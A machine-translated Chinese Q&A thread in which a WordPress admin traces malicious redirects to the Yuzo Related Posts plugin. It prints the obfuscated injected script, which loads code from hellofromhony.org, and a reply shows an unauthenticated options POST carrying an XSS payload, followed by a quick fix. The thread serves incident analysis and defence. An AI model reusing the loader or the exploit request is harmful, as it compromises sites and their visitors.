大约一个小时前,我管理的Wordpress页面开始重定向到广告/恶意软件页面。
我找到了重定向的来源,想为其他受影响的人提供帮助,并且需要帮助来找到实际的漏洞和/或修复程序。
重定向是在网站加载完成后发生的,因此我一直在页面中查找JavaScript代码段,并在网络分析器中查找可疑的重定向。明显的恶意重定向是:hellofromhony.org,thebiggestfavoritemake.com,nnatrevaleur.tk和一个试图抢占我当前位置的站点(尽管无法多次复制该位置)。
我能够追溯到重定向到https://hellofromhony.org/counter的重定向,该重定向是通过代码段嵌入的。
该代码段嵌入在wp_options项中,键为“ yuzo_related_post_options”-更具体地说,嵌入在option_value的json选项“ yuzo_related_post_css_and_style”中。无需消毒即可回显该选项。
此选项是Yuzo Related Posts插件的一部分,该插件大约一周前已停产: https://wordpress.org/plugins/yuzo-related-post/
删除该插件后立即停止了重定向,我找不到其他篡改该站点的痕迹。
option_value中的代码段:
</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>
在移除插件的同时,我想更深入地研究一下,以确保没有访问数据库,后端和网站空间的权限。
答案 0 :(得分:8)
我相信我刚刚找到了它: 保存选项时, Yuzo相关文章插件不检查身份验证。
所以发布
yuzo_related_post_css_and_style=</style><script+language=javascript>alert('hacked');</script>
到/wp-admin/options-general.php?page=yuzo-related-post也会成功。
该插件正在使用is_admin()来检查身份验证,但这是一个“假朋友”,并且仅检查所访问的页面是否在管理区域中,而不检查用户是否经过身份验证(未授权)。参见Wordpress documentation。
一种继续使用该插件的快速解决方案是通过在/assets/functions/options.php第1155行的if-Statement中添加false来删除设置选项:
function __construct(){
global $if_utils;
$this->utils = $if_utils;
if(false/* is_admin() */)
self::configuration_plugin();
else
self::parameters();
}
更新:
Hang Guan指向a Blog Post about this issue from last week,现在看来似乎已经“荒野”。